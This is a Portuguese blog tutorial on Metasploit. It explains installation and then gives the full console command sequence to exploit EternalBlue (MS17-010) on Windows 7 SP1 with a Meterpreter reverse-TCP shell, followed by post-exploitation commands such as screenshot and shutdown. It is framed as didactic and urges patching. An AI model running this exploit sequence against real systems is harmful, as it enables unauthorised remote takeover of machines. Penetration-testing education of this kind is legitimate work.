Como Acessar o Windows pelo Linux com Metasploit

O Metasploit é uma ferramenta usada por pentesters para avaliar as capacidade de segurança de um sistema, fazer invasões e também detectar intrusos. É uma ferramenta muito comum em distribuições Linux voltadas para este meio, como o Kali Linux. Hoje você vai conhecer uma de suas facetas. 

Metasploit



Metasploit é um projeto de segurança da informação que fornece informações sobre vulnerabilidades de segurança e ajuda nos testes de penetração. É de propriedade da empresa de segurança Rapid7, de Boston, Massachusetts, que possui diversos softwares (Opcode – Banco de Dados ; e o Shellcode , que executa comandos de Shell Script… ), entre eles o mais conhecido é o Metasploit Framework, um software de código aberto para explorar falhas de uma máquina remota.
O Metasploit possui 6 tipos de módulos (auxiliaryexploitpayloadpostencoder e nop) . No vídeo apresentado por nós, vamos utilizar o Meterpreter que é um payload avançado.

Instalação

Existem diversas maneiras de você instalar o Metasploit Framework. Baixando diretamente pelo site  ou pelo GitHub
Para quem gosta de fazer manualmente, é possível instalá-lo via gerenciador de pacotes da sua distribuição, por exemplo, na distribuição Ubuntu, Linux Mint, Debian e derivados basta realizar os comandos abaixo:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall

sudo ./msfinstall

msfdb init

E pronto, o Metasploit está pronto para uso! 
Lembrando que em algumas distribuições já possuem o Metasploit instalado por padrão, como o Pentoo e o Kali Linux, entre  outras criadas especialmente para testes de invasão.
O Próximo passo é rodar o Metasploit por este comando:

msfconsole

Isso irá abrir o framework, e em seguida usaremos o Meterpreter para acessar o Windows , basta rodar os comandos abaixo na ordem:

use exploit/windows/smb/ms17_010_eternalblue

set RHOST NÚMERO_IP_DA_MÁQUINA_WINDOWS

set payload windows/x64/meterpreter/reverse_tcp

set LHOST NÚMERO_IP_DA_SUA_MÁQUINA

set encoder generic/none

exploit


Lembrando que esses comandos são “a grosso modo”, e servem para Windows 7 Service Pack 1 , para outras versões assista o vídeo com link abaixo que há mais detalhes para variados casos.
Após acessar você pode obter informações detalhadas do sistema com o comando sysinfo; tirar um print da tela com o comando screenshot ; saber qual diretório você está com o comando pwd a saída será algo do tipo *c:32* ; desligar, reiniciar,… entre vários  comandos  que podem ser  consultados  pelo comando help .

Confira o exemplo no vídeo:


Esse artigo e o vídeo apresentado foram criados com finalidade didática, mantenha o seu Windows atualizado para evitar ser exposto a coisas do tipo. A falha explorada neste exemplo, por exemplo, já foi corrigida pela Microsoft, daí a importância de manter os sistemas sempre atualizados.

Se você ainda não domina Shell Script e o Terminal Linux. Aproveite uma promoção onde você pode adquirir 5 cursos de terminal Linux, incluindo Shell Script, Expressões Regulares, Vim e Sed. 

Clicando nesse link http://bit.ly/Promo5pg para adquirir com o PagSeguro ou nesse link http://bit.ly/5CursosLinux para adquirir com o PayPal. Se quiser mais detalhes da promoção veja essa postagem: 5 Cursos do Terminal Linux para você !

Esse artigo foi escrito em parceria com a galera do Terminal Root, os quais são os autores dos cursos mencionados acima, até a próxima!_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Talvez Você Também Goste